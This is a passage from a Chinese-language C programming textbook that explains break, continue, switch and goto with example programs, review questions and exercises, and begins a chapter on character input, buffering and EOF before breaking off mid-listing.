break.c程序 /* break.c -- 使用 break 退出循环 */ #include <stdio.h> int main(void) { float length, width; printf("Enter the length of the rectangle:\n"); while (scanf("%f", &length) == 1) { printf("Length = %0.2f:\n", length); printf("Enter its width:\n"); if (scanf("%f", &width) != 1) break; printf("Width = %0.2f:\n", width); printf("Area = %0.2f:\n", length * width); printf("Enter the length of the rectangle:\n"); } 461 printf("Done.\n"); return 0; } 可以这样控制循环: while (scanf("%f %f", &length, &width) == 2) 但是,用break可以方便显示用户输入的值。 和continue一样,如果用了break代码反而更复杂,就不要使用break。例 如,考虑下面的循环: while ((ch = getchar()) != '\n') { if (ch == '\t') break; putchar(ch); } 如果把两个测试条件放在一起,逻辑就更清晰了: while ((ch = getchar() ) != '\n' && ch != '\t') putchar(ch); break语句对于稍后讨论的switch语句而言至关重要。 在for循环中的break和continue的情况不同,执行完break语句后会直接执 行循环后面的第1条语句,连更新部分也跳过。嵌套循环内层的break只会让 462 程序跳出包含它的当前循环,要跳出外层循环还需要一个break: int p, q; scanf("%d", &p); while (p > 0) { printf("%d\n", p); scanf("%d", &q); while (q > 0) { printf("%d\n", p*q); if (q > 100) break; // 跳出内层循环 scanf("%d", &q); } if (q > 100) break; // 跳出外层循环 scanf("%d", &p); } 463 7.7 多重选择:switch和break 使用条件运算符和 if else 语句很容易编写二选一的程序。然而,有时程 序需要在多个选项中进行选择。可以用if else if...else来完成。但是,大多数 情况下使用switch语句更方便。程序清单7.11演示了如何使用switch语句。该 程序读入一个字母,然后打印出与该字母开头的动物名。 程序清单7.11 animals.c程序 /* animals.c -- 使用switch语句 */ #include <stdio.h> #include <ctype.h> int main(void) { char ch; printf("Give me a letter of the alphabet, and I will give "); printf("an animal name\nbeginning with that letter.\n"); printf("Please type in a letter; type # to end my act.\n"); 
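    /* 主循环:逐个读取字符,读到#结束;换行符直接跳过,只有小写字母才交给下面的switch处理 */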
while ((ch = getchar()) != '#') { if ('\n' == ch) continue; if (islower(ch))  /* 只接受小写字母*/ 464 switch (ch) { case 'a': printf("argali, a wild sheep of Asia\n"); break; case 'b': printf("babirusa, a wild pig of Malay\n"); break; case 'c': printf("coati, racoonlike mammal\n"); break; case 'd': printf("desman, aquatic, molelike critter\n"); break; case 'e': printf("echidna, the spiny anteater\n"); break; case 'f': printf("fisher, brownish marten\n"); 465 break; default: printf("That's a stumper!\n"); }        /* switch结束    */ else printf("I recognize only lowercase letters.\n"); while (getchar() != '\n') continue;   /* 跳过输入行的剩余部分 */ printf("Please type another letter or a #.\n"); }          /* while循环结束   */ printf("Bye!\n"); return 0; } 篇幅有限,我们只编到f,后面的字母以此类推。在进一步解释该程序 之前,先看看输出示例: Give me a letter of the alphabet, and I will give an animal name beginning with that letter. Please type in a letter; type # to end my act. a [enter] 466 argali, a wild sheep of Asia Please type another letter or a #. dab [enter] desman, aquatic, molelike critter Please type another letter or a #. r [enter] That's a stumper! Please type another letter or a #. Q [enter] I recognize only lowercase letters. Please type another letter or a #. # [enter] Bye! 该程序的两个主要特点是:使用了switch语句和它对输出的处理。我们 先分析switch的工作原理。 7.7.1 switch语句 要对紧跟在关键字 switch 后圆括号中的表达式求值。在程序清单 7.11 中,该表达式是刚输入给 ch的值。然后程序扫描标签(这里指,case 'a' :、 case 'b' :等)列表,直到发现一个匹配的值为止。然后程序跳转至那一行。 如果没有匹配的标签怎么办?如果有default :标签行,就跳转至该行;否 则,程序继续执行在switch后面的语句。 467 break语句在其中起什么作用?它让程序离开switch语句,跳至switch语 句后面的下一条语句(见图7.4)。如果没有break语句,就会从匹配标签开 始执行到switch末尾。例如,如果删除该程序中的所有break语句,运行程序 后输入d,其交互的输出结果如下: 468 图7.4 switch中有break和没有break的程序流 Give me a letter of the alphabet, and I will give an animal name 469 beginning with that letter. Please type in a letter; type # to end my act. d [enter] desman, aquatic, molelike critter echidna, the spiny anteater fisher, a brownish marten That's a stumper! Please type another letter or a #. # [enter] Bye! 
如上所示,执行了从case 'd':到switch语句末尾的所有语句。 顺带一提,break语句可用于循环和switch语句中,但是continue只能用 于循环中。尽管如此,如果switch语句在一个循环中,continue便可作为 switch语句的一部分。这种情况下,就像在其他循环中一样,continue让程序 跳出循环的剩余部分,包括switch语句的其他部分。 如果读者熟悉Pascal,会发现switch语句和Pascal的case语句类似。它们 最大的区别在于,如果只希望处理某个带标签的语句,就必须在switch语句 中使用break语句。另外,C语言的case一般都指定一个值,不能使用一个范 围。 switch在圆括号中的测试表达式的值应该是一个整数值(包括char类 型)。case标签必须是整数类型(包括char类型)的常量或整型常量表达式 (即,表达式中只包含整型常量)。不能用变量作为case标签。switch的构 470 造如下: switch ( 整型表达式) { case 常量1: 语句   <--可选 case 常量2: 语句   <--可选 default :   <--可选 语句   <--可选 } 7.7.2 只读每行的首字符 animals.c(程序清单7.11)的另一个独特之处是它读取输入的方式。运 行程序时读者可能注意到了,当输入dab时,只处理了第1个字符。这种丢弃 一行中其他字符的行为,经常出现在响应单字符的交互程序中。可以用下面 的代码实现这样的行为: while (getchar() != '\n') continue;    /* 跳过输入行的其余部分 */ 循环从输入中读取字符,包括按下Enter键产生的换行符。注意,函数 的返回值并没有赋给ch,以上代码所做的只是读取并丢弃字符。由于最后丢 弃的字符是换行符,所以下一个被读取的字符是下一行的首字母。在外层的 while循环中,getchar()读取首字母并赋给ch。 471 假设用户一开始就按下Enter键,那么程序读到的首个字符就是换行 符。下面的代码处理这种情况: if (ch == '\n') continue; 7.7.3 多重标签 如程序清单7.12所示,可以在switch语句中使用多重case标签。 程序清单7.12 vowels.c程序 // vowels.c -- 使用多重标签 #include <stdio.h> int main(void) { char ch; int a_ct, e_ct, i_ct, o_ct, u_ct; a_ct = e_ct = i_ct = o_ct = u_ct = 0; printf("Enter some text; enter # to quit.\n"); while ((ch = getchar()) != '#') { switch (ch) { 472 case 'a': case 'A': a_ct++; break; case 'e': case 'E': e_ct++; break; case 'i': case 'I': i_ct++; break; case 'o': case 'O': o_ct++; break; case 'u': case 'U': u_ct++; break; default:  break; }         // switch结束 }            // while循环结束 printf("number of vowels:  A  E  I  O  U\n"); 473 printf("        %4d %4d %4d %4d %4d\n", a_ct, e_ct, i_ct, o_ct, u_ct); return 0; } 假设如果ch是字母i,switch语句会定位到标签为case 'i' :的位置。由于 该标签没有关联break语句,所以程序流直接执行下一条语句,即i_ct++;。 如果 ch是字母I,程序流会直接定位到case 'I' :。本质上,两个标签都指的是 相同的语句。 严格地说,case 'U'的 break 语句并不需要。因为即使删除这条 break 语 句,程序流会接着执行switch中的下一条语句,即default : break;。所以,可 以把case 'U'的break语句去掉以缩短代码。但是从另一方面看,保留这条 break语句可以防止以后在添加新的case(例如,把y作为元音)时遗漏break 语句。 下面是该程序的运行示例: Enter some text; enter # to quit. 
I see under the overseer.# number of vowels:   A  E  I  O  U 0  7  1  1  1 在该例中,如果使用ctype.h系列的toupper()函数(参见表7.2)可以避免 使用多重标签,在进行测试之前就把字母转换成大写字母: while ((ch = getchar()) != '#') { 474 ch = toupper(ch); switch (ch) { case 'A': a_ct++; break; case 'E': e_ct++; break; case 'I': i_ct++; break; case 'O': o_ct++; break; case 'U': u_ct++; break; default: break; } // switch结束 } // while循环结束 或者,也可以先不转换ch,把toupper(ch)放进switch的测试条件中: switch(toupper(ch))。 小结:带多重选择的switch语句 475 关键字:switch 一般注解: 程序根据expression的值跳转至相应的case标签处。然后,执行剩下的所 有语句,除非执行到break语句进行重定向。expression和case标签都必须是 整数值(包括char类型),标签必须是常量或完全由常量组成的表达式。如 果没有case标签与expression的值匹配,控制则转至标有default的语句(如果 有的话);否则,将转至执行紧跟在switch语句后面的语句。 形式: switch ( expression ) { case label1 : statement1//使用break跳出switch case label2 : statement2 default   : statement3 } 可以有多个标签语句,default语句可选。 示例: switch (choice) { case 1 : case 2 : printf("Darn tootin'!\n"); break; 476 case 3 : printf("Quite right!\n"); case 4 : printf("Good show!\n"); break; default: printf("Have a nice day.\n"); } 如果choice的值是1或2,打印第1条消息;如果choice的值是3,打印第2 条和第3条消息(程序继续执行后续的语句,因为case 3后面没有break语 句);如果choice的值是4,则打印第3条消息;如果choice的值是其他值只 打印最后一条消息。 7.7.4 switch和if else 何时使用switch?何时使用if else?你经常会别无选择。如果是根据浮 点类型的变量或表达式来选择,就无法使用 switch。如果根据变量在某范围 内决定程序流的去向,使用 switch 就很麻烦,这种情况用if就很方便: if (integer < 1000 && integer > 2) 使用switch要涵盖以上范围,需要为每个整数(3~999)设置case标 签。但是,如果使用switch,程序通常运行快一些,生成的代码少一些。 477 7.8 goto语句 早期版本的BASIC和FORTRAN所依赖的goto语句,在C中仍然可用。但 是C和其他两种语言不同,没有goto语句C程序也能运行良好。Kernighan和 Ritchie提到goto语句“易被滥用”,并建议“谨慎使用,或者根本不用”。首 先,介绍一下如何使用goto语句;然后,讲解为什么通常不需要它。 goto语句有两部分:goto和标签名。标签的命名遵循变量命名规则,如 下所示: goto part2; 要让这条语句正常工作,函数还必须包含另一条标为part2的语句,该 语句以标签名后紧跟一个冒号开始: part2: printf("Refined analysis:\n"); 7.8.1 避免使用goto 原则上,根本不用在C程序中使用goto语句。但是,如果你曾经学过 FORTRAN或BASIC(goto对这两种语言而言都必不可少),可能还会依赖 用goto来编程。为了帮助你克服这个习惯,我们先概述一些使用goto的常见 情况,然后再介绍C的解决方案。 处理包含多条语句的if语句: if (size > 12) goto a; goto b; a: cost = cost * 1.05; flag = 2; 478 b: bill = cost * flag; 对于以前的BASIC和FORTRAN,只有直接跟在if条件后面的一条语句才 属于if,不能使用块或复合语句。我们把以上模式转换成等价的C代码,标 准C用复合语句或块来处理这种情况: if (size > 12) { cost = cost * 1.05; flag = 2; } bill = cost * flag; 二选一: if (ibex > 14) goto a; sheds = 2; goto b; a: sheds= 3; b: help = 2 * sheds; C通过if else表达二选一更清楚: if (ibex > 14) sheds = 3; 479 else sheds = 2; help = 2 * sheds; 实际上,新版的BASIC和FORTRAN已经把else纳入新的语法中。 创建不确定循环: readin: scanf("%d", &score); if (score < O) goto stage2; lots of statements goto readin; stage2: more stuff; C用while循环代替: scanf("%d", &score); while (score <= 0) { lots of statements scanf("%d", &score); } more stuff; 480 跳转至循环末尾,并开始下一轮迭代。C使用continue语句代替。 跳出循环。C使用break语句。实际上,break和continue是goto的特殊形 式。使用break和 continue 的好处是:其名称已经表明它们的用法,而且这些 语句不使用标签,所以不用担心把标签放错位置导致的危险。 胡乱跳转至程序的不同部分。简而言之,不要这样做! 
但是,C程序员可以接受一种goto的用法——出现问题时从一组嵌套循 环中跳出(一条break语句只能跳出当前循环): while (funct > 0) { for (i = 1, i <= 100; i++) { for (j = 1; j <= 50; j++) { 其他语句 if (问题) goto help; 其他语句 } 其他语句 } 481 其他语句 } 其他语句 help: 语句 从其他例子中也能看出,程序中使用其他形式比使用goto的条理更清 晰。当多种情况混在一起时,这种差异更加明显。哪些goto语句可以帮助if 语句?哪些可以模仿if else?哪些控制循环?哪些是因为程序无路可走才不 得已放在那里?过度地使用 goto 语句,会让程序错综复杂。如果不熟悉goto 语句,就不要使用它。如果已经习惯使用goto语句,试着改掉这个毛病。讽 刺地是,虽然C根本不需要goto,但是它的goto比其他语言的goto好用,因为 C允许在标签中使用描述性的单词而不是数字。 小结:程序跳转 关键字:break、continue、goto 一般注解: 这3种语句都能使程序流从程序的一处跳转至另一处。 break语句: 所有的循环和switch语句都可以使用break语句。它使程序控制跳出当前 循环或switch语句的剩余部分,并继续执行跟在循环或switch后面的语句。 示例: switch (number) { case 4: printf("That's a good choice.\n"); 482 break; case 5: printf("That's a fair choice.\n"); break; default: printf("That's a poor choice.\n"); } continue语句: 所有的循环都可以使用continue语句,但是switch语句不行。continue语 句使程序控制跳出循环的剩余部分。对于while或for循环,程序执行到 continue语句后会开始进入下一轮迭代。对于do while循环,对出口条件求值 后,如有必要会进入下一轮迭代。 示例: while ((ch = getchar()) != '\n') { if (ch == ' ') continue; putchar(ch); chcount++; } 以上程序段把用户输入的字符再次显示在屏幕上,并统计非空格字符。 goto语句: 483 goto语句使程序控制跳转至相应标签语句。冒号用于分隔标签和标签语 句。标签名遵循变量命名规则。标签语句可以出现在goto的前面或后面。 形式: goto label ; label : statement 示例: top : ch = getchar(); if (ch != 'y') goto top; 484 7.9 关键概念 智能的一个方面是,根据情况做出相应的响应。所以,选择语句是开发 具有智能行为程序的基础。C语言通过if、if else和switch语句,以及条件运 算符(?:)可以实现智能选择。 if 和 if else 语句使用测试条件来判断执行哪些语句。所有非零值都被视 为 true,零被视为false。测试通常涉及关系表达式(比较两个值)、逻辑表 达式(用逻辑运算符组合或更改其他表达式)。 要记住一个通用原则,如果要测试两个条件,应该使用逻辑运算符把两 个完整的测试表达式组合起来。例如,下面这些是错误的: if (a < x < z)       // 错误,没有使用逻辑运算符 … if (ch != 'q' && != 'Q')  // 错误,缺少完整的测试表达式 … 正确的方式是用逻辑运算符连接两个关系表达式: if (a < x && x < z)       // 使用&&组合两个表达式 … if (ch != 'q' && ch != 'Q')  // 使用&&组合两个表达式 … 对比这两章和前几章的程序示例可以发现:使用第6章、第7章介绍的语 句,可以写出功能更强大、更有趣的程序。 485 7.10 本章小结 本章介绍了很多内容,我们来总结一下。if语句使用测试条件控制程序 是否执行测试条件后面的一条简单语句或复合语句。如果测试表达式的值是 非零值,则执行语句;如果测试表达式的值是零,则不执行语句。if else语 句可用于二选一的情况。如果测试条件是非零,则执行else前面的语句;如 果测试表达式的值是零,则执行else后面的语句。在else后面使用另一个if语 句形成else if,可构造多选一的结构。 测试条件通常都是关系表达式,即用一个关系运算符(如,<或==)的 表达式。使用C的逻辑运算符,可以把关系表达式组合成更复杂的测试条 件。 在多数情况下,用条件运算符(?:)写成的表达式比if else语句更简 洁。 ctype.h系列的字符函数(如,issapce()和isalpha())为创建以分类字符为 基础的测试表达式提供了便捷的工具。 switch 语句可以在一系列以整数作为标签的语句中进行选择。如果紧跟 在 switch 关键字后的测试条件的整数值与某标签匹配,程序就转至执行匹 配的标签语句,然后在遇到break之前,继续执行标签语句后面的语句。 break、continue和goto语句都是跳转语句,使程序流跳转至程序的另一 处。break语句使程序跳转至紧跟在包含break语句的循环或switch末尾的下一 条语句。continue语句使程序跳出当前循环的剩余部分,并开始下一轮迭 代。 486 7.11 复习题 复习题的参考答案在附录A中。 1.判断下列表达式是true还是false。 a 100 > 3 && 'a'>'c' b 100 > 3 || 'a'>'c' c !(100>3) 2.根据下列描述的条件,分别构造一个表达式: a umber等于或大于90,但是小于100 b h不是字符q或k c umber在1~9之间(包括1和9),但不是5 d umber不在1~9之间 3.下面的程序关系表达式过于复杂,而且还有些错误,请简化并改正。 #include <stdio.h> int main(void)                  /* 1 */ {                        /* 2 */ int weight, height; /* weight以磅为单位,height以英寸为单位 *//* 4 */ scanf("%d , weight, height);          /* 5 */ if (weight < 100 && height > 64)        /* 6 */ 487 if (height >= 72)             /* 7 */ printf("You are very tall for your weight.\n"); else if (height < 72 &&> 64)        /* 9 */ printf("You are tall for your weight.\n");/* 10 */ else if (weight > 300 && !(weight <= 300)  /* 11 */ && height < 48)            /* 12 */ if (!(height >= 48))            /* 13 */ printf(" You are quite short for your weight.\n"); else                     /* 15 */ printf("Your weight is ideal.\n");      /* 16 */ /* 17 */ return 0; } 4.下列个表达式的值是多少? a.5 > 2 b.3 + 4 > 2 && 3 < 2 c.x >= y || y > x d.d = 5 + ( 6 > 2 ) e.'X' > 'T' ? 10 : 5 488 f.x > y ? y > x : x > y 5.下面的程序将打印什么? 
#include <stdio.h> int main(void) { int num; for (num = 1; num <= 11; num++) { if (num % 3 == 0) putchar('$'); else putchar('*'); putchar('#'); putchar('%'); } putchar('\n'); return 0; } 6.下面的程序将打印什么? 489 #include <stdio.h> int main(void) { int i = 0; while (i < 3) { switch (i++) { case 0: printf("fat "); case 1: printf("hat "); case 2: printf("cat "); default: printf("Oh no!"); } putchar('\n'); } return 0; } 7.下面的程序有哪些错误? #include <stdio.h> int main(void) { 490 char ch; int lc = 0; /* 统计小写字母 int uc = 0; /* 统计大写字母 int oc = 0; /* 统计其他字母 while ((ch = getchar()) != '#') { if ('a' <= ch >= 'z') lc++; else if (!(ch < 'A') || !(ch > 'Z') uc++; oc++; } printf(%d lowercase, %d uppercase, %d other, lc, uc, oc); return 0; } 8.下面的程序将打印什么? /* retire.c */ #include <stdio.h> int main(void) 491 { int age = 20; while (age++ <= 65) { if ((age % 20) == 0) /* age是否能被20整除? */ printf("You are %d.Here is a raise.\n", age); if (age = 65) printf("You are %d.Here is your gold watch.\n", age); } return 0; } 9.给定下面的输入时,以下程序将打印什么? q c h b #include <stdio.h> int main(void) { 492 char ch; while ((ch = getchar()) != '#') { if (ch == '\n') continue; printf("Step 1\n"); if (ch == 'c') continue; else if (ch == 'b') break; else if (ch == 'h') goto laststep; printf("Step 2\n"); laststep: printf("Step 3\n"); } printf("Done\n"); return 0; } 10.重写复习题9,但这次不能使用continue和goto语句。 493 7.12 编程练习 1.编写一个程序读取输入,读到#字符停止,然后报告读取的空格数、 换行符数和所有其他字符的数量。 2.编写一个程序读取输入,读到#字符停止。程序要打印每个输入的字 符以及对应的ASCII码(十进制)。一行打印8个字符。建议:使用字符计数 和求模运算符(%)在每8个循环周期时打印一个换行符。 3.编写一个程序,读取整数直到用户输入 0。输入结束后,程序应报告 用户输入的偶数(不包括 0)个数、这些偶数的平均值、输入的奇数个数及 其奇数的平均值。 4.使用if else语句编写一个程序读取输入,读到#停止。用感叹号替换句 号,用两个感叹号替换原来的感叹号,最后报告进行了多少次替换。 5.使用switch重写练习4。 6.编写程序读取输入,读到#停止,报告ei出现的次数。 注意 该程序要记录前一个字符和当前字符。用“Receive your eieio award”这 样的输入来测试。 7.编写一个程序,提示用户输入一周工作的小时数,然后打印工资总 额、税金和净收入。做如下假设: a.基本工资 = 1000美元/小时 b.加班(超过40小时) = 1.5倍的时间 c.税率: 前300美元为15% 续150美元为20% 494 余下的为25% 用#define定义符号常量。不用在意是否符合当前的税法。 8.修改练习7的假设a,让程序可以给出一个供选择的工资等级菜单。使 用switch完成工资等级选择。运行程序后,显示的菜单应该类似这样: ***************************************************************** Enter the number corresponding to the desired pay rate or action: 1) $8.75/hr              2) $9.33/hr 3) $10.00/hr             4) $11.20/hr 5) quit ***************************************************************** 如果选择 1~4 其中的一个数字,程序应该询问用户工作的小时数。程 序要通过循环运行,除非用户输入 5。如果输入 1~5 以外的数字,程序应 提醒用户输入正确的选项,然后再重复显示菜单提示用户输入。使用#define 创建符号常量表示各工资等级和税率。 9.编写一个程序,只接受正整数输入,然后显示所有小于或等于该数的 素数。 10.1988年的美国联邦税收计划是近代最简单的税收方案。它分为4个类 别,每个类别有两个等级。 下面是该税收计划的摘要(美元数为应征税的收入): 495 例如,一位工资为20000美元的单身纳税人,应缴纳税费 0.15×17850+0.28×(20000−17850)美元。编写一个程序,让用户指定缴纳 税金的种类和应纳税收入,然后计算税金。程序应通过循环让用户可以多次 输入。 11.ABC 邮购杂货店出售的洋蓟售价为 2.05 美元/磅,甜菜售价为 1.15 美元/磅,胡萝卜售价为 1.09美元/磅。在添加运费之前,100美元的订单有 5%的打折优惠。少于或等于5磅的订单收取6.5美元的运费和包装费,5磅~ 20磅的订单收取14美元的运费和包装费,超过20磅的订单在14美元的基础上 每续重1磅增加0.5美元。编写一个程序,在循环中用switch语句实现用户输 入不同的字母时有不同的响应,即输入a的响应是让用户输入洋蓟的磅数,b 是甜菜的磅数,c是胡萝卜的磅数,q 是退出订购。程序要记录累计的重 量。即,如果用户输入 4 磅的甜菜,然后输入 5磅的甜菜,程序应报告9磅 的甜菜。然后,该程序要计算货物总价、折扣(如果有的话)、运费和包装 费。随后,程序应显示所有的购买信息:物品售价、订购的重量(单位: 磅)、订购的蔬菜费用、订单的总费用、折扣(如果有的话)、运费和包装 费,以及所有的费用总额。 496 第8章 字符输入/输出和输入验证 本章介绍以下内容: 更详细地介绍输入、输出以及缓冲输入和无缓冲输入的区别 如何通过键盘模拟文件结尾条件 如何使用重定向把程序和文件相连接 创建更友好的用户界面 在涉及计算机的话题时,我们经常会提到输入(input)和输出 (output)。我们谈论输入和输出设备(如键盘、U盘、扫描仪和激光打印 机),讲解如何处理输入数据和输出数据,讨论执行输入和输出任务的函 数。本章主要介绍用于输入和输出的函数(简称I/O函数)。 I/O函数(如printf()、scanf()、getchar()、putchar()等)负责把信息传送 到程序中。前几章简单介绍过这些函数,本章将详细介绍它们的基本概念。 同时,还会介绍如何设计与用户交互的界面。 最初,输入/输出函数不是C定义的一部分,C把开发这些函数的任务留 给编译器的实现者来完成。在实际应用中,UNIX 系统中的 C 实现为这些函 数提供了一个模型。ANSI C 库吸取成功的经验,把大量的UNIX I/O函数囊 括其中,包括一些我们曾经用过的。由于必须保证这些标准函数在不同的计 
算机环境中能正常工作,所以它们很少使用某些特殊系统才有的特性。因 此,许多C供应商会利用硬件的特性,额外提供一些I/O函数。其他函数或函 数系列需要特殊的操作系统支持,如Winsows或Macintosh OS提供的特殊图 形界面。这些有针对性、非标准的函数让程序员能更有效地使用特定计算机 编写程序。本章只着重讲解所有系统都通用的标准 I/O 函数,用这些函数编 写的可移植程序很容易从一个系统移植到另一个系统。处理文件输入/输出 的程序也可以使用这些函数。 497 许多程序都有输入验证,即判断用户的输入是否与程序期望的输入匹 配。本章将演示一些与输入验证相关的问题和解决方案。 498 8.1 单字符I/O:getchar()和putchar() 第 7 章中提到过,getchar()和 putchar()每次只处理一个字符。你可能认 为这种方法实在太笨拙了,毕竟与我们的阅读方式相差甚远。但是,这种方 法很适合计算机。而且,这是绝大多数文本(即,普通文字)处理程序所用 的核心方法。为了帮助读者回忆这些函数的工作方式,请看程序清单8.1。 该程序获取从键盘输入的字符,并把这些字符发送到屏幕上。程序使用 while 循环,当读到#字符时停止。 程序清单8.1 echo.c程序 /* echo.c -- 重复输入 */ #include <stdio.h> int main(void) { char ch; while ((ch = getchar()) != '#') putchar(ch); return 0; } 自从ANSI C标准发布以后,C就把stdio.h头文件与使用getchar()和 putchar()相关联,这就是为什么程序中要包含这个头文件的原因(其实, getchar()和 putchar()都不是真正的函数,它们被定义为供预处理器使用的 宏,我们在第16章中再详细讨论)。运行该程序后,与用户的交互如下: Hello, there. I would[enter] 499 Hello, there. I would like a #3 bag of potatoes.[enter] like a 读者可能好奇,为何输入的字符能直接显示在屏幕上?如果用一个特殊 字符(如,#)来结束输入,就无法在文本中使用这个字符,是否有更好的 方法结束输入?要回答这些问题,首先要了解 C程序如何处理键盘输入,尤 其是缓冲和标准输入文件的概念。 500 8.2 缓冲区 如果在老式系统运行程序清单8.1,你输入文本时可能显示如下: HHeelllloo,, tthheerree..II wwoouulldd[enter] lliikkee aa # 以上行为是个例外。像这样回显用户输入的字符后立即重复打印该字符 是属于无缓冲(或直接)输入,即正在等待的程序可立即使用输入的字符。 对于该例,大部分系统在用户按下Enter键之前不会重复打印刚输入的字 符,这种输入形式属于缓冲输入。用户输入的字符被收集并储存在一个被称 为缓冲区(buffer)的临时存储区,按下Enter键后,程序才可使用用户输入 的字符。图8.1比较了这两种输入。 图8.1 缓冲输入和无缓冲输入 为什么要有缓冲区?首先,把若干字符作为一个块进行传输比逐个发送 这些字符节约时间。其次,如果用户打错字符,可以直接通过键盘修正错 501 误。当最后按下Enter键时,传输的是正确的输入。 虽然缓冲输入好处很多,但是某些交互式程序也需要无缓冲输入。例 如,在游戏中,你希望按下一个键就执行相应的指令。因此,缓冲输入和无 缓冲输入都有用武之地。 缓冲分为两类:完全缓冲I/O和行缓冲I/O。完全缓冲输入指的是当缓冲 区被填满时才刷新缓冲区(内容被发送至目的地),通常出现在文件输入 中。缓冲区的大小取决于系统,常见的大小是 512 字节和 4096字节。行缓 冲I/O指的是在出现换行符时刷新缓冲区。键盘输入通常是行缓冲输入,所 以在按下Enter键后才刷新缓冲区。 那么,使用缓冲输入还是无缓冲输入?ANSI C和后续的C标准都规定输 入是缓冲的,不过最初K&R把这个决定权交给了编译器的编写者。读者可 以运行echo.c程序观察输出的情况,了解所用的输出类型。 ANSI C决定把缓冲输入作为标准的原因是:一些计算机不允许无缓冲 输入。如果你的计算机允许无缓冲输入,那么你所用的C编译器很可能会提 供一个无缓冲输入的选项。例如,许多IBM PC兼容机的编译器都为支持无 缓冲输入提供一系列特殊的函数,其原型都在conio.h头文件中。这些函数包 括用于回显无缓冲输入的getche()函数和用于无回显无缓冲输入的getch()函数 (回显输入意味着用户输入的字符直接显示在屏幕上,无回显输入意味着击 键后对应的字符不显示)。UNIX系统使用另一种不同的方式控制缓冲。在 UNIX系统中,可以使用ioctl()函数(该函数属于UNIX库,但是不属于C标 准)指定待输入的类型,然后用getchar()执行相应的操作。在ANSI C中,用 setbuf()和setvbuf()函数(详见第13章)控制缓冲,但是受限于一些系统的内 部设置,这些函数可能不起作用。总之,ANSI没有提供调用无缓冲输入的 标准方式,这意味着是否能进行无缓冲输入取决于计算机系统。在这里要对 使用无缓冲输入的朋友说声抱歉,本书假设所有的输入都是缓冲输入。 502 8.3 结束键盘输入 在echo.c程序(程序清单8.1)中,只要输入的字符中不含#,那么程序 在读到#时才会结束。但是, #也是一个普通的字符,有时不可避免要用 到。应该用一个在文本中用不到的字符来标记输入完成,这样的字符不会无 意间出现在输入中,在你不希望结束程序的时候终止程序。C 的确提供了这 样的字符,不过在此之前,先来了解一下C处理文件的方式。 8.3.1 文件、流和键盘输入 文件(file)是存储器中储存信息的区域。通常,文件都保存在某种永 久存储器中(如,硬盘、U盘或DVD等)。毫无疑问,文件对于计算机系统 相当重要。例如,你编写的C程序就保存在文件中,用来编译C程序的程序 也保存在文件中。后者说明,某些程序需要访问指定的文件。当编译储存在 名为 echo.c 文件中的程序时,编译器打开echo.c文件并读取其中的内容。当 编译器处理完后,会关闭该文件。其他程序,例如文字处理器,不仅要打 开、读取和关闭文件,还要把数据写入文件。 C 是一门强大、灵活的语言,有许多用于打开、读取、写入和关闭文件 的库函数。从较低层面上,C可以使用主机操作系统的基本文件工具直接处 理文件,这些直接调用操作系统的函数被称为底层 I/O (low-level I/O)。 由于计算机系统各不相同,所以不可能为普通的底层I/O函数创建标准库, ANSI C也不打算这样做。然而从较高层面上,C还可以通过标准I/O包 (standard I/O package)来处理文件。这涉及创建用于处理文件的标准模型 和一套标准I/O函数。在这一层面上,具体的C实现负责处理不同系统的差 异,以便用户使用统一的界面。 上面讨论的差异指的是什么?例如,不同的系统储存文件的方式不同。 有些系统把文件的内容储存在一处,而文件相关的信息储存在另一处;有些 系统在文件中创建一份文件描述。在处理文件方面,有些系统使用单个换行 符标记行末尾,而其他系统可能使用回车符和换行符的组合来表示行末尾。 有些系统用最小字节来衡量文件的大小,有些系统则以字节块的大小来衡 503 量。 如果使用标准 I/O 包,就不用考虑这些差异。因此,可以用 if (ch == )检查换行符。即使系统实际用的是回车符和换行符的组合来标记行 末尾,I/O函数会在两种表示法之间相互转换。 从概念上看,C程序处理的是流而不是直接处理文件。流(stream)是 一个实际输入或输出映射的理想化数据流。这意味着不同属性和不同种类的 输入,由属性更统一的流来表示。于是,打开文件的过程就是把流与文件相 关联,而且读写都通过流来完成。 第13章将更详细地讨论文件。本章着重理解C把输入和输出设备视为存 储设备上的普通文件,尤其是把键盘和显示设备视为每个C程序自动打开的 文件。stdin流表示键盘输入,stdout流表示屏幕输出。getchar()、putchar()、 printf()和scanf()函数都是标准I/O包的成员,处理这两个流。 以上讨论的内容说明,可以用处理文件的方式来处理键盘输入。例如, 
程序读文件时要能检测文件的末尾才知道应在何处停止。因此,C 的输入函 数内置了文件结尾检测器。既然可以把键盘输入视为文件,那么也应该能使 用文件结尾检测器结束键盘输入。下面我们从文件开始,学习如何结束文 件。 8.3.2 文件结尾 计算机操作系统要以某种方式判断文件的开始和结束。检测文件结尾的 一种方法是,在文件末尾放一个特殊的字符标记文件结尾。CP/M、IBM- DOS和MS-DOS的文本文件曾经用过这种方法。如今,这些操作系统可以使 用内嵌的Ctrl+Z字符来标记文件结尾。这曾经是操作系统使用的唯一标记, 不过现在有一些其他的选择,例如记录文件的大小。所以现代的文本文件不 一定有嵌入的Ctrl+Z,但是如果有,该操作系统会将其视为一个文件结尾标 记。图8.2演示了这种方法。 504 图8.2 带文件结尾标记的文件 操作系统使用的另一种方法是储存文件大小的信息。如果文件有3000字 节,程序在读到3000字节时便达到文件的末尾。MS-DOS 及其相关系统使用 这种方法处理二进制文件,因为用这种方法可以在文件中储存所有的字符, 包括Ctrl+Z。新版的DOS也使用这种方法处理文本文件。UNIX使用这种方法 处理所有的文件。 无论操作系统实际使用何种方法检测文件结尾,在C语言中,用 getchar()读取文件检测到文件结尾时将返回一个特殊的值,即EOF(end of file的缩写)。scanf()函数检测到文件结尾时也返回EOF。通常, EOF定义 在stdio.h文件中: #define EOF (-1) 为什么是-1?因为getchar()函数的返回值通常都介于0~127,这些值对 应标准字符集。但是,如果系统能识别扩展字符集,该函数的返回值可能在 0~255之间。无论哪种情况,-1都不对应任何字符,所以,该值可用于标记 文件结尾。 某些系统也许把EOF定义为-1以外的值,但是定义的值一定与输入字符 所产生的返回值不同。如果包含stdio.h文件,并使用EOF符号,就不必担心 EOF值不同的问题。这里关键要理解EOF是一个值,标志着检测到文件结 尾,并不是在文件中找得到的符号。 505 那么,如何在程序中使用EOF?把getchar()的返回值和EOF作比较。如 果两值不同,就说明没有到达文件结尾。也就是说,可以使用下面这样的表 达式: while ((ch = getchar()) != EOF) 如果正在读取的是键盘输入不是文件会怎样?绝大部分系统(不是全 部)都有办法通过键盘模拟文件结尾条件。了解这些以后,读者可以重写程 序清单8.1的程序,如程序清单8.2所示。 程序清单8.2 echo_eof.c程序 /* echo_eof.c -- 重复输入,直到文件结尾 */ #include <stdio.h> int main(void) { int ch; while ((ch = 